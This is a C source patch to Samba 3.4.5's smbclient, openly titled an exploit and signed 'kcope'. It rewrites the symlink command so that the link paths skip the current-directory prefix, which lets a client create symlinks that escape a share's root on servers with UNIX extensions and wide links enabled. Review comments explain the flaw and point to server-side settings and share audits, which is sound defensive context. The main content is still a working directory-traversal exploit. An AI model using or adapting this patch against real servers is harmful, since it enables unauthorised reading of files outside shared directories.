smbclient patch (exploit): samba-3.4.5/source3/client/client.c

/****************************************************************************
 UNIX symlink.

 smbclient "symlink <oldname> <newname>" command, modified so that both
 arguments are used exactly as typed instead of being prefixed with
 client_get_cur_dir(). The upstream lines are kept in the comment block
 inside the function for comparison.

 Reads two tokens from cmd_ptr, resolves oldname with cli_resolve_path(),
 requires SERVER_HAS_UNIX_CIFS() on the resolved connection, then calls
 cli_unix_symlink(). Returns 0 on success and 1 on any failure.

 NOTE(review): the prefix that was removed is purely a client-side
 convention, so it was never a security boundary. A server cannot rely on
 the client to keep symlink paths anchored inside the share; what a
 client-created symlink may point at, and whether the server follows it,
 has to be decided on the server. On Samba that is smb.conf policy (the
 "unix extensions" and "wide links" parameters) -- confirm the recommended
 settings and fixed versions against the vendor advisory, not this page.
 For review of an existing share: symlinks whose target resolves outside
 the share root are the thing to look for.
****************************************************************************/

static int cmd_symlink(void)
{
	TALLOC_CTX *ctx = talloc_tos();
	char *oldname = NULL;
	char *newname = NULL;
	char *buf = NULL;
	char *buf2 = NULL;
	char *targetname = NULL;
	struct cli_state *targetcli;

	/* Both arguments are required; otherwise print the usage line. */
	if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
	    !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
		d_printf("symlink <oldname> <newname>\n");
		return 1;
	}

	/* << HERE modified: format is "%s" only, so buf is copied as typed
	 * with no current-directory prefix. */
	oldname = talloc_asprintf(ctx, "%s",
				  buf);
	if (!oldname) {
		return 1;
	}

	/* << HERE modified: same change for the second argument. */
	newname = talloc_asprintf(ctx, "%s",
				  buf2);
	if (!newname) {
		return 1;
	}

	/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
	oldname = talloc_asprintf(ctx, "%s%s", // < modified (see above)
			client_get_cur_dir(),   // < removed (see above)
			buf);
	if (!oldname) {
		return 1;
	}
	newname = talloc_asprintf(ctx, "%s%s", // < modified (see above)
			client_get_cur_dir(),   // < removed (see above)
			buf2);
	if (!newname) {
		return 1;
	}
	----------------------------------------------*/

	/* Resolve oldname to a connection (targetcli) and a path on it
	 * (targetname); the error text on failure comes from cli. */
	if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
		d_printf("link %s: %s\n", oldname, cli_errstr(cli));
		return 1;
	}

	/* The symlink call is only attempted when the server advertises
	 * the UNIX CIFS calls. */
	if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
		d_printf("Server doesn't support UNIX CIFS calls.\n");
		return 1;
	}

	/* newname is passed through unresolved. The error message prints
	 * "newname -> targetname", which suggests newname is the link and
	 * targetname what it points to -- confirm against cli_unix_symlink(). */
	if (!cli_unix_symlink(targetcli, targetname, newname)) {
		d_printf("%s symlinking files (%s -> %s)\n",
			cli_errstr(targetcli), newname, targetname);
		return 1;
	}

	return 0;
}

// Cheers,
// kcope